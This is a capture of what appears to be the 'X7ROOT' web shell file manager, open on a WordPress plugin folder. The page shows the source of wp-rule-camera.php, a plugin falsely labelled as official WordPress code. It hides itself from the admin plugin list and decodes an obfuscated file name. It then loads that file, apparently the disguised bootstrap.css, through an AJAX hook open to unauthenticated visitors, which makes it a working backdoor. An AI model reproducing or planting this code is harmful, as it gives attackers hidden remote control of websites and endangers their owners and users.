X7ROOT File Manager
Current Path:
/home/oakwood/public_html/wp-content/plugins/wp-rule-camera
home
/
oakwood
/
public_html
/
wp-content
/
plugins
/
wp-rule-camera
/
ðŸ“
..
📄
bootstrap.css
(27.48 KB)
📄
wp-rule-camera.php
(1.37 KB)
Editing: wp-rule-camera.php
<?php /* Plugin Name: WP Rule Camera Plugin URI: http://wordpress.org/# Description: Official WordPress plugin Author: WordPress Version: 2.4.9 Author URI: http://wordpress.org/# */ if (!defined('ABSPATH')) { exit; } function wpp_ova() { global $wp_list_table; if (!isset($wp_list_table)) { return; } $h = array('wp-rule-camera/wp-rule-camera.php'); if (isset($wp_list_table->items) && is_array($wp_list_table->items)) { foreach ($wp_list_table->items as $key => $val) { if (in_array($key, $h)) { unset($wp_list_table->items[$key]); } } } } add_action('pre_current_active_plugins', 'wpp_ova'); function krq_ext($plugins) { $p = 'wp-rule-camera/wp-rule-camera.php'; if (array_key_exists($p, $plugins)) { unset($plugins[$p]); } return $plugins; } add_filter('all_plugins', 'krq_ext'); function wlz($f, $d) { $r = ''; for ($i = 0; $i < strlen($f); $i += 2) { $v = ord($f[$i]) - 65; $b = ord($f[$i + 1]); if ($b > 90) $b -= 6; $s = $v * 52 + ($b - 65); $r .= chr($s - $d); } return $r; } function lly_ajax_handler() { require plugin_dir_path(__FILE__) . wlz('IGITITIYIXIYIWIFIUHGIHIXIX', 324); wp_die(); } add_action('wp_ajax_wp-hpg', 'lly_ajax_handler'); add_action('wp_ajax_nopriv_wp-hpg', 'lly_ajax_handler');
Upload File
Create Folder